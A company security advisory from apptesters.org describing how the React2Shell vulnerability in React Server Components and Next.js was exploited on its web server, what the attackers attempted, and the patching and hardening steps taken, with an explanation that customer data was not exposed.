AdvisoryIncident contained

Security Advisory: React2Shell (CVE-2025-55182 / CVE-2025-66478)

This page explains how the React2Shell vulnerability affected apptesters.org, what we did to secure our systems, and what it means for your data.

First published
12 December 2025 (IST)
Status
Patched & monitored
CVE IDs
CVE-2025-55182 (React), CVE-2025-66478 (Next.js)

Impact to customer data

No evidence of customer data access

This server does not store your account details, orders, payment information, or certificates. Those live on our Google & Amazon cloud backends, which were not compromised.

Data exposure risk (this host)

What happened

Remote code execution on web server

A critical React Server Components vulnerability was exploited against our public Next.js app. Attackers were able to run limited commands inside a restricted container on the web server.

Simplified request flow

Attacker RequestNext.js appNode service

Current state

Vulnerability patched, C2 blocked, access hardened

We upgraded to patched versions, removed any leftover malicious artifacts, blocked the attack infrastructure at the firewall, tightened SSH settings, and added health monitoring.

Defence layers now in place

Patched appFirewall blocksSSH hardening

What is React2Shell (CVE-2025-55182 / CVE-2025-66478)?

React2Shell is a critical remote code execution vulnerability in React Server Components (RSC). It is tracked as CVE-2025-55182 in React itself and CVE-2025-66478 for its downstream impact on Next.js applications using the App Router.

In vulnerable versions, the RSC protocol could be tricked into unsafe deserialization of attacker-controlled data. That data could then directly invoke server-side APIs and run arbitrary shell commands via Node.js:

  • An attacker sends a crafted HTTP request to a vulnerable endpoint.
  • The server processes the malicious RSC payload and ends up running arbitrary commands inside the Node.js process.
  • Those commands run with the same privileges as the web application on that server.

The vulnerability was rated CVSS 10.0 (critical) and has been widely exploited in the wild against unpatched applications.

What happened on apptesters.org?

Our main website apptesters.org runs on Next.js with React Server Components. During the global React2Shell exploitation wave, attackers triggered remote code execution on this production web server.

From log and process analysis, we observed:

  • Exploit traffic invoked Node.js commands attempting to download and run generic botnet / malware payloads.
  • Multiple attempts were made to fetch binaries and scripts from external command-and-control servers and to establish persistence.
  • These payloads mostly failed because the application was running in a restricted container with no long-lived shell, no global package manager, and strict resource limits.
  • No evidence was found of data exfiltration, credential harvesting, or lateral movement from this host to our cloud backends.

What we did to secure our systems

Our response focused on patching the vulnerability, removing any potential malware, and hardening access to reduce the blast radius of similar issues in the future.

1. Patched the application stack

Updated Next.js to 15.3.6 using the official fix-react2shell-next tool, ensuring we use the hardened React Server Components implementation.

2. Removed suspicious artifacts

Searched for known miner / botnet indicators, removed any unknown binaries or scripts, and ensured no malicious services or cron jobs remained.

3. Hardened SSH access

Restricted SSH logins to key-based root access only, reviewed authorized keys, and tightened configuration to reduce remote entry points.

4. Added network-level blocks

Added explicit firewall rules to block communication with known malicious command-and-control IPs associated with this campaign.

5. Improved monitoring & health checks

Enabled lightweight health monitoring on key processes and added safeguards to detect abnormal resource usage on the server.

6. Documented & will iterate

Prepared this public incident summary and a more detailed internal report so we can continue improving our security posture.

What this means for your data

The most important question is whether this incident affected your data. Based on our architecture and investigation:

Where your data actually lives

  • Customer accounts, orders, device identifiers (UDIDs), and operational data are stored on our managed cloud backends ( Google / Amazon services).
  • This web server hosts only the Next.js frontend and API layer that talks to those backends; it does not store full copies of that data on disk.
  • We found no evidence that attackers accessed those cloud systems or any customer records.

In short: this incident affected the UI server environment, not the databases where your information lives.

Staying ahead of security issues

We treat incidents seriously, even when customer data is not exposed. This advisory is part of our commitment to being clear about what happened and how we respond.

Security overview